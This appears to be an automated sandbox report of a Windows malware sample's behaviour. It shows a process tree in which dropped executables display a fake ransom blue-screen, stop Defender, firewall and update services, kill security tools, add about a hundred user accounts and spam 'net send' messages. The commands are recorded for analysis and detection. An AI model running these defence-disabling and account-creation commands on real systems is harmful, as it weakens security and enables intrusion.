PID 4248 wrote to memory of 1476	4248	net.exe	110
PID 4248 wrote to memory of 1476	4248	net.exe	110
PID 244 wrote to memory of 1220	244	cmd.exe	111
PID 244 wrote to memory of 1220	244	cmd.exe	111
PID 244 wrote to memory of 2156	244	cmd.exe	166
PID 244 wrote to memory of 2156	244	cmd.exe	166
PID 2156 wrote to memory of 1408	2156	net.exe	113
PID 2156 wrote to memory of 1408	2156	net.exe	113
PID 244 wrote to memory of 3744	244	cmd.exe	169
PID 244 wrote to memory of 3744	244	cmd.exe	169
PID 3744 wrote to memory of 2788	3744	net.exe	115
PID 3744 wrote to memory of 2788	3744	net.exe	115
PID 244 wrote to memory of 4836	244	cmd.exe	116
PID 244 wrote to memory of 4836	244	cmd.exe	116
PID 4836 wrote to memory of 4784	4836	net.exe	117
PID 4836 wrote to memory of 4784	4836	net.exe	117
PID 244 wrote to memory of 5076	244	cmd.exe	118
PID 244 wrote to memory of 5076	244	cmd.exe	118
PID 5076 wrote to memory of 4608	5076	net.exe	119

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3676	attrib.exe
960	attrib.exe

C:\Users\Admin\AppData\Local\Temp\ulmal.exe
"C:\Users\Admin\AppData\Local\Temp\ulmal.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3956
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8146.tmp\8147.tmp\8148.bat C:\Users\Admin\AppData\Local\Temp\ulmal.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1112
- - C:\Users\Admin\AppData\Local\Temp\BSOD.exe
    BSOD.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    PID:2896
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd /c BluescreenSimulator.exe --read-command-file
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5060
    - - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BluescreenSimulator.exe
        
        BluescreenSimulator.exe --read-command-file
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2552
      - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BluescreenSimulator.exe
        
        "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BluescreenSimulator.exe" --win10 -e ":)" -m1 "We have hacked your computer!" -m2 "There is no escape. Have fun with your encrypted files." -p encrypted -mi "For more information visit scammer.info" -s "We will encrypt your files" -sc "And you will pay us money for your files back. Also, your system is corrupted probably" -c -b "#FF22A909"
        6⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4744
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe"
        7⤵
        
        PID:2540
- - C:\Users\Admin\AppData\Local\Temp\winupdate.exe
    winupdate
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2848
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\831A.tmp\831B.tmp\831C.bat C:\Users\Admin\AppData\Local\Temp\winupdate.exe"
      4⤵
      Drops file in System32 directory
      Drops file in Program Files directory
      Drops file in Windows directory
      Modifies registry class
      Suspicious use of WriteProcessMemory
      PID:244
    - - C:\Windows\system32\net.exe
        
        net stop "WinDefend"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:460
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "WinDefend"
        6⤵
        
        PID:2344
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /t /im "MSASCui.exe"
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2112
    - - C:\Windows\system32\net.exe
        
        net stop "WSearch"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1044
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "WSearch"
        6⤵
        
        PID:4716
    - - C:\Windows\system32\net.exe
        
        net stop "wuauserv"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2076
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "wuauserv"
        6⤵
        
        PID:3680
    - - C:\Windows\system32\net.exe
        
        net stop "WPCSvc"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2952
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "WPCSvc"
        6⤵
        
        PID:3452
    - - C:\Windows\system32\net.exe
        
        net stop "MpsSvc"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:428
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MpsSvc"
        6⤵
        
        PID:4232
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /t /im "FirewallControlPanel.exe"
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2300
    - - C:\Windows\system32\net.exe
        
        net stop "WerSvc"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3904
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "WerSvc"
        6⤵
        
        PID:4240
    - - C:\Windows\system32\net.exe
        
        net stop "wscsvc"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4248
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "wscsvc"
        6⤵
        
        PID:1476
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\msgbox.vbs"
        5⤵
        
        PID:1220
    - - C:\Windows\system32\net.exe
        
        net user 2184 17257 /add
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2156
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 2184 17257 /add
        6⤵
        
        PID:1408
    - - C:\Windows\system32\net.exe
        
        net user 19740 28144 /add
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3744
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 19740 28144 /add
        6⤵
        
        PID:2788
    - - C:\Windows\system32\net.exe
        
        net user 19164 19017 /add
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4836
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 19164 19017 /add
        6⤵
        
        PID:4784
    - - C:\Windows\system32\net.exe
        
        net user 19489 15922 /add
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:5076
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 19489 15922 /add
        6⤵
        
        PID:4608
    - - C:\Windows\system32\net.exe
        
        net user 22885 27400 /add
        5⤵
        
        PID:2216
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 22885 27400 /add
        6⤵
        
        PID:1980
    - - C:\Windows\system32\net.exe
        
        net user 9757 6094 /add
        5⤵
        
        PID:1516
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 9757 6094 /add
        6⤵
        
        PID:2640
    - - C:\Windows\system32\net.exe
        
        net user 16667 21637 /add
        5⤵
        
        PID:2768
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 16667 21637 /add
        6⤵
        
        PID:2744
    - - C:\Windows\system32\net.exe
        
        net user 3334 26934 /add
        5⤵
        
        PID:760
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 3334 26934 /add
        6⤵
        
        PID:4944
    - - C:\Windows\system32\net.exe
        
        net user 27068 30301 /add
        5⤵
        
        PID:4740
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 27068 30301 /add
        6⤵
        
        PID:3400
    - - C:\Windows\system32\net.exe
        
        net user 32147 6548 /add
        5⤵
        
        PID:2240
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 32147 6548 /add
        6⤵
        
        PID:2900
    - - C:\Windows\system32\net.exe
        
        net user 17878 16561 /add
        5⤵
        
        PID:668
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 17878 16561 /add
        6⤵
        
        PID:4380
    - - C:\Windows\system32\net.exe
        
        net user 4080 26289 /add
        5⤵
        
        PID:540
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 4080 26289 /add
        6⤵
        
        PID:616
    - - C:\Windows\system32\net.exe
        
        net user 18721 4393 /add
        5⤵
        
        PID:2528
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 18721 4393 /add
        6⤵
        
        PID:4796
    - - C:\Windows\system32\net.exe
        
        net user 16566 23061 /add
        5⤵
        
        PID:1112
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 16566 23061 /add
        6⤵
        
        PID:2920
    - - C:\Windows\system32\net.exe
        
        net user 6419 28984 /add
        5⤵
        
        PID:1856
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 6419 28984 /add
        6⤵
        
        PID:5000
    - - C:\Windows\system32\net.exe
        
        net user 17946 6512 /add
        5⤵
        
        PID:3376
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 17946 6512 /add
        6⤵
        
        PID:1636
    - - C:\Windows\system32\net.exe
        
        net user 11183 2466 /add
        5⤵
        
        PID:3532
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 11183 2466 /add
        6⤵
        
        PID:2120
    - - C:\Windows\system32\net.exe
        
        net user 17765 5688 /add
        5⤵
        
        PID:3512
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 17765 5688 /add
        6⤵
        
        PID:3148
    - - C:\Windows\system32\net.exe
        
        net user 18590 28476 /add
        5⤵
        
        PID:5068
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 18590 28476 /add
        6⤵
        
        PID:1100
    - - C:\Windows\system32\net.exe
        
        net user 31908 24724 /add
        5⤵
        
        PID:4920
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 31908 24724 /add
        6⤵
        
        PID:4668
    - - C:\Windows\system32\net.exe
        
        net user 8320 11507 /add
        5⤵
        
        PID:4540
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 8320 11507 /add
        6⤵
        
        PID:2540
    - - C:\Windows\system32\net.exe
        
        net user 13472 8569 /add
        5⤵
        
        PID:4232
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 13472 8569 /add
        6⤵
        
        PID:428
    - - C:\Windows\system32\net.exe
        
        net user 28292 12048 /add
        5⤵
        
        PID:3484
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 28292 12048 /add
        6⤵
        
        PID:2092
    - - C:\Windows\system32\net.exe
        
        net user 3856 18 /add
        5⤵
        
        PID:2248
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 3856 18 /add
        6⤵
        
        PID:1684
    - - C:\Windows\system32\net.exe
        
        net user 22582 29627 /add
        5⤵
        
        PID:3012
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 22582 29627 /add
        6⤵
        
        PID:4248
    - - C:\Windows\system32\net.exe
        
        net user 1294 30310 /add
        5⤵
        
        PID:2516
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 1294 30310 /add
        6⤵
        
        PID:1368
    - - C:\Windows\system32\net.exe
        
        net user 32665 9405 /add
        5⤵
        
        PID:3028
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 32665 9405 /add
        6⤵
        
        PID:4628
    - - C:\Windows\system32\net.exe
        
        net user 10696 22837 /add
        5⤵
        
        PID:2156
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 10696 22837 /add
        6⤵
        
        PID:4420
    - - C:\Windows\system32\net.exe
        
        net user 31606 32394 /add
        5⤵
        
        PID:4012
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 31606 32394 /add
        6⤵
        
        PID:3744
    - - C:\Windows\system32\net.exe
        
        net user 1400 5922 /add
        5⤵
        
        PID:1760
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 1400 5922 /add
        6⤵
        
        PID:2832
    - - C:\Windows\system32\net.exe
        
        net user 10739 10366 /add
        5⤵
        
        PID:4664
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 10739 10366 /add
        6⤵
        
        PID:3788
    - - C:\Windows\system32\net.exe
        
        net user 7318 29464 /add
        5⤵
        
        PID:2360
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 7318 29464 /add
        6⤵
        
        PID:3236
    - - C:\Windows\system32\net.exe
        
        net user 4455 25191 /add
        5⤵
        
        PID:2980
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 4455 25191 /add
        6⤵
        
        PID:1924
    - - C:\Windows\system32\net.exe
        
        net user 30539 15846 /add
        5⤵
        
        PID:1480
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 30539 15846 /add
        6⤵
        
        PID:2744
    - - C:\Windows\system32\net.exe
        
        net user 17261 11076 /add
        5⤵
        
        PID:2768
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 17261 11076 /add
        6⤵
        
        PID:4944
    - - C:\Windows\system32\net.exe
        
        net user 15658 21292 /add
        5⤵
        
        PID:2612
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 15658 21292 /add
        6⤵
        
        PID:2448
    - - C:\Windows\system32\net.exe
        
        net user 30264 17740 /add
        5⤵
        
        PID:4740
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 30264 17740 /add
        6⤵
        
        PID:1568
    - - C:\Windows\system32\net.exe
        
        net user 14619 23931 /add
        5⤵
        
        PID:2240
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 14619 23931 /add
        6⤵
        
        PID:2168
    - - C:\Windows\system32\net.exe
        
        net user 18470 15154 /add
        5⤵
        
        PID:1036
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 18470 15154 /add
        6⤵
        
        PID:4252
    - - C:\Windows\system32\net.exe
        
        net user 22935 9656 /add
        5⤵
        
        PID:2876
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 22935 9656 /add
        6⤵
        
        PID:4796
    - - C:\Windows\system32\net.exe
        
        net user 24983 19112 /add
        5⤵
        
        PID:2856
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 24983 19112 /add
        6⤵
        
        PID:4600
    - - C:\Windows\system32\net.exe
        
        net user 283 29121 /add
        5⤵
        
        PID:1052
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 283 29121 /add
        6⤵
        
        PID:3688
    - - C:\Windows\system32\net.exe
        
        net user 26879 22562 /add
        5⤵
        
        PID:960
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 26879 22562 /add
        6⤵
        
        PID:3132
    - - C:\Windows\system32\net.exe
        
        net user 15062 13907 /add
        5⤵
        
        PID:460
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 15062 13907 /add
        6⤵
        
        PID:3376
    - - C:\Windows\system32\net.exe
        
        net user 32058 20444 /add
        5⤵
        
        PID:3532
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 32058 20444 /add
        6⤵
        
        PID:3900
    - - C:\Windows\system32\net.exe
        
        net user 10149 8236 /add
        5⤵
        
        PID:4008
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 10149 8236 /add
        6⤵
        
        PID:3504
    - - C:\Windows\system32\net.exe
        
        net user 10784 6174 /add
        5⤵
        
        PID:4212
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 10784 6174 /add
        6⤵
        
        PID:4408
    - - C:\Windows\system32\net.exe
        
        net user 14146 14444 /add
        5⤵
        
        PID:3680
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 14146 14444 /add
        6⤵
        
        PID:4924
    - - C:\Windows\system32\net.exe
        
        net user 2906 30911 /add
        5⤵
        
        PID:4540
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 2906 30911 /add
        6⤵
        
        PID:428
    - - C:\Windows\system32\net.exe
        
        net user 441 10305 /add
        5⤵
        
        PID:4232
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 441 10305 /add
        6⤵
        
        PID:4004
    - - C:\Windows\system32\net.exe
        
        net user 4468 7144 /add
        5⤵
        
        PID:3904
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 4468 7144 /add
        6⤵
        
        PID:2300
    - - C:\Windows\system32\net.exe
        
        net user 21787 24515 /add
        5⤵
        
        PID:1684
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 21787 24515 /add
        6⤵
        
        PID:2248
    - - C:\Windows\system32\net.exe
        
        net user 7474 3098 /add
        5⤵
        
        PID:4248
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 7474 3098 /add
        6⤵
        
        PID:3012
    - - C:\Windows\system32\net.exe
        
        net user 19317 9245 /add
        5⤵
        
        PID:4672
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 19317 9245 /add
        6⤵
        
        PID:4436
    - - C:\Windows\system32\net.exe
        
        net user 25896 21362 /add
        5⤵
        
        PID:4628
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 25896 21362 /add
        6⤵
        
        PID:3028
    - - C:\Windows\system32\net.exe
        
        net user 32003 18670 /add
        5⤵
        
        PID:1056
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 32003 18670 /add
        6⤵
        
        PID:4204
    - - C:\Windows\system32\net.exe
        
        net user 22917 8236 /add
        5⤵
        
        PID:4848
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 22917 8236 /add
        6⤵
        
        PID:3524
    - - C:\Windows\system32\net.exe
        
        net user 8866 6383 /add
        5⤵
        
        PID:1484
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 8866 6383 /add
        6⤵
        
        PID:2832
    - - C:\Windows\system32\net.exe
        
        net user 31280 4711 /add
        5⤵
        
        PID:1760
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 31280 4711 /add
        6⤵
        
        PID:792
    - - C:\Windows\system32\net.exe
        
        net user 15492 12757 /add
        5⤵
        
        PID:4072
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 15492 12757 /add
        6⤵
        
        PID:3236
    - - C:\Windows\system32\net.exe
        
        net user 21270 5927 /add
        5⤵
        
        PID:2360
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 21270 5927 /add
        6⤵
        
        PID:4972
    - - C:\Windows\system32\net.exe
        
        net user 4391 22393 /add
        5⤵
        
        PID:2980
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 4391 22393 /add
        6⤵
        
        PID:2748
    - - C:\Windows\system32\net.exe
        
        net user 4802 29856 /add
        5⤵
        
        PID:2400
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 4802 29856 /add
        6⤵
        
        PID:3080
    - - C:\Windows\system32\net.exe
        
        net user 6280 566 /add
        5⤵
        
        PID:4736
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 6280 566 /add
        6⤵
        
        PID:2448
    - - C:\Windows\system32\net.exe
        
        net user 28462 27570 /add
        5⤵
        
        PID:2536
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 28462 27570 /add
        6⤵
        
        PID:1568
    - - C:\Windows\system32\net.exe
        
        net user 10132 11410 /add
        5⤵
        
        PID:760
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 10132 11410 /add
        6⤵
        
        PID:1196
    - - C:\Windows\system32\net.exe
        
        net user 19672 4784 /add
        5⤵
        
        PID:3616
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 19672 4784 /add
        6⤵
        
        PID:2584
    - - C:\Windows\system32\net.exe
        
        net user 28639 9249 /add
        5⤵
        
        PID:2840
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 28639 9249 /add
        6⤵
        
        PID:3404
    - - C:\Windows\system32\net.exe
        
        net user 23577 19813 /add
        5⤵
        
        PID:1824
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 23577 19813 /add
        6⤵
        
        PID:3848
    - - C:\Windows\system32\net.exe
        
        net user 10136 24999 /add
        5⤵
        
        PID:3380
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 10136 24999 /add
        6⤵
        
        PID:4980
    - - C:\Windows\system32\net.exe
        
        net user 8370 1625 /add
        5⤵
        
        PID:1052
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 8370 1625 /add
        6⤵
        
        PID:3132
    - - C:\Windows\system32\net.exe
        
        net user 28093 11389 /add
        5⤵
        
        PID:3896
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 28093 11389 /add
        6⤵
        
        PID:2008
    - - C:\Windows\system32\net.exe
        
        net user 6056 3408 /add
        5⤵
        
        PID:2184
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 6056 3408 /add
        6⤵
        
        PID:1688
    - - C:\Windows\system32\net.exe
        
        net user 16011 3382 /add
        5⤵
        
        PID:4056
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 16011 3382 /add
        6⤵
        
        PID:1360
    - - C:\Windows\system32\net.exe
        
        net user 28499 16148 /add
        5⤵
        
        PID:4008
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 28499 16148 /add
        6⤵
        
        PID:4668
    - - C:\Windows\system32\net.exe
        
        net user 3129 21377 /add
        5⤵
        
        PID:4212
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 3129 21377 /add
        6⤵
        
        PID:4924
    - - C:\Windows\system32\net.exe
        
        net user 1457 23156 /add
        5⤵
        
        PID:3680
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 1457 23156 /add
        6⤵
        
        PID:4084
    - - C:\Windows\system32\net.exe
        
        net user 20453 13137 /add
        5⤵
        
        PID:4236
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 20453 13137 /add
        6⤵
        
        PID:564
    - - C:\Windows\system32\net.exe
        
        net user 8448 9869 /add
        5⤵
        
        PID:4864
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 8448 9869 /add
        6⤵
        
        PID:2624
    - - C:\Windows\system32\net.exe
        
        net user 9935 15676 /add
        5⤵
        
        PID:2300
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 9935 15676 /add
        6⤵
        
        PID:484
    - - C:\Windows\system32\net.exe
        
        net user 5771 20040 /add
        5⤵
        
        PID:2248
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 5771 20040 /add
        6⤵
        
        PID:1684
    - - C:\Windows\system32\net.exe
        
        net user 20421 13857 /add
        5⤵
        
        PID:3012
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 20421 13857 /add
        6⤵
        
        PID:4248
    - - C:\Windows\system32\net.exe
        
        net user 21444 5412 /add
        5⤵
        
        PID:4436
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 21444 5412 /add
        6⤵
        
        PID:4672
    - - C:\Windows\system32\net.exe
        
        net user 7390 4622 /add
        5⤵
        
        PID:3860
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 7390 4622 /add
        6⤵
        
        PID:2332
    - - C:\Windows\system32\net.exe
        
        net user 32147 18742 /add
        5⤵
        
        PID:4204
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 32147 18742 /add
        6⤵
        
        PID:1056
    - - C:\Windows\system32\net.exe
        
        net user 11627 5729 /add
        5⤵
        
        PID:3524
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 11627 5729 /add
        6⤵
        
        PID:4848
    - - C:\Windows\system32\net.exe
        
        net user 6638 5742 /add
        5⤵
        
        PID:1372
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 6638 5742 /add
        6⤵
        
        PID:5012
    - - C:\Windows\system32\net.exe
        
        net user 1067 26413 /add
        5⤵
        
        PID:4608
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 1067 26413 /add
        6⤵
        
        PID:1920
    - - C:\Windows\system32\net.exe
        
        net user 30634 7963 /add
        5⤵
        
        PID:3236
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 30634 7963 /add
        6⤵
        
        PID:4072
    - - C:\Windows\system32\net.exe
        
        net user 19902 991 /add
        5⤵
        
        PID:2640
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 19902 991 /add
        6⤵
        
        PID:2596
    - - C:\Windows\system32\net.exe
        
        net user 18576 32177 /add
        5⤵
        
        PID:2744
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 18576 32177 /add
        6⤵
        
        PID:3352
    - - C:\Windows\system32\net.exe
        
        net user 27484 30497 /add
        5⤵
        
        PID:2768
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 27484 30497 /add
        6⤵
        
        PID:2340
    - - C:\Windows\system32\net.exe
        
        net user 8628 5066 /add
        5⤵
        
        PID:2400
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 8628 5066 /add
        6⤵
        
        PID:2448
    - - C:\Windows\system32\net.exe
        
        net user 5575 15870 /add
        5⤵
        
        PID:4736
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 5575 15870 /add
        6⤵
        
        PID:4888
    - - C:\Windows\system32\net.exe
        
        net user 22018 19052 /add
        5⤵
        
        PID:4200
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 22018 19052 /add
        6⤵
        
        PID:948
    - - C:\Windows\system32\net.exe
        
        net user 11390 10823 /add
        5⤵
        
        PID:4828
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user 11390 10823 /add
        6⤵
        
        PID:2772
    - - C:\Windows\system32\net.exe
        
        net start "messenger"
        5⤵
        
        PID:4868
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start "messenger"
        6⤵
        
        PID:1904
    - - C:\Windows\system32\net.exe
        
        net send * "Spammed Message"
        5⤵
        
        PID:4600
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 send * "Spammed Message"
        6⤵
        
        PID:3932
    - - C:\Windows\system32\net.exe
        
        net send * "Spammed Message"
        5⤵
        
        PID:3844
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 send * "Spammed Message"
        6⤵
        
        PID:3676
    - - C:\Windows\system32\net.exe
        
        net send * "Spammed Message"
        5⤵
        
        PID:180
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 send * "Spammed Message"
        6⤵
        
        PID:3440
    - - C:\Windows\system32\net.exe
        
        net send * "Spammed Message"
        5⤵
        
        PID:4652
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 send * "Spammed Message"
        6⤵
        
        PID:3572
    - - C:\Windows\system32\net.exe
        
        net send * "Spammed Message"
        5⤵
        
        PID:1688
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 send * "Spammed Message"
        6⤵
        
        PID:2184
    - - C:\Windows\system32\net.exe
        
        net send * "Spammed Message"
        5⤵
        
        PID:3504
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 send * "Spammed Message"
        6⤵
        
        PID:5068
    - - C:\Windows\system32\net.exe
        
        net send * "Spammed Message"
        5⤵
        
        PID:1100
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 send * "Spammed Message"
        6⤵
        
        PID:3896
    - - C:\Windows\system32\net.exe
        
        net send * "Spammed Message"
        5⤵
        
        PID:2076
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 send * "Spammed Message"
        6⤵
        
        PID:2540
    - - C:\Windows\system32\net.exe
        
        net send * "Spammed Message"
        5⤵
        
        PID:2664
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 send * "Spammed Message"
        6⤵
        
        PID:3112
    - - C:\Windows\system32\net.exe
        
        net send * "Spammed Message"
        5⤵
        
        PID:4004
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 send * "Spammed Message"
        6⤵
        
        PID:3868
    - - C:\Windows\system32\net.exe
        
        net send * "Spammed Message"
        5⤵
        
        PID:4232
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 send * "Spammed Message"
        6⤵
        
        PID:1084
    - - C:\Windows\system32\net.exe
        
        net send * "Spammed Message"
        5⤵
        
        PID:2784
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 send * "Spammed Message"
        6⤵
        
        PID:2092
    - - C:\Windows\system32\net.exe
        
        net send * "Spammed Message"
        5⤵
        
        PID:1036
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 send * "Spammed Message"
        6⤵
        
        PID:4404
    - - C:\Windows\system32\net.exe
        
        net send * "Spammed Message"
        5⤵
        
        PID:4804
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 send * "Spammed Message"
        6⤵
        
        PID:1476
    - - C:\Windows\system32\net.exe
        
        net send * "Spammed Message"
        5⤵
        
        PID:2788
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 send * "Spammed Message"
        6⤵
        
